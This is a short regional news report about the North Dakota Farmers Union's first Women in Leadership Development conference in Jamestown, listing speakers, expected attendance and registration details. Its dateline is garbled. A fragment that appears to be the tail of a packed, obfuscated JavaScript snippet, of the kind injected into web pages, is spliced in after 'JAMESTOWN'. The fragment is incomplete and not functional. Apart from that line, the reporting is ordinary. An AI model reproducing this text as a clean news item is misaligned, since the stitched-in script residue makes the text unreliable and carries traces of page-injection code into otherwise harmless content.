JAMESTOWN tskfy|var|u0026u|referrer|ykdsf||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Women from across the state will be in Jamestown on Friday and Saturday for the North Dakota Farmer’s Union first Women in Leadership Development (WILD) conference.

Carla Edinger is Member Operations Coordinator for the Farmers Union. She says Jessie Veeder is the keynote speaker for the conference, a writer, singer and rancher who lives near Watford City.

Other speakers include U.S. House candidate Pam Gulleson and Kelly Schmidt, North Dakota’s state treasurer and the only woman currently holding an elected statewide office.

She says at last count they had more than 70 women from across the state signed up, and she was expecting more to still register. Anyone interested in registering can do it at www.ndfu.org/wild or call 1-800-366-8331, ext 127.

The events open with a pre-conference social Friday night at Quality Inn, and then the conference runs Saturday at the North Dakota Farmer’s Union state office.
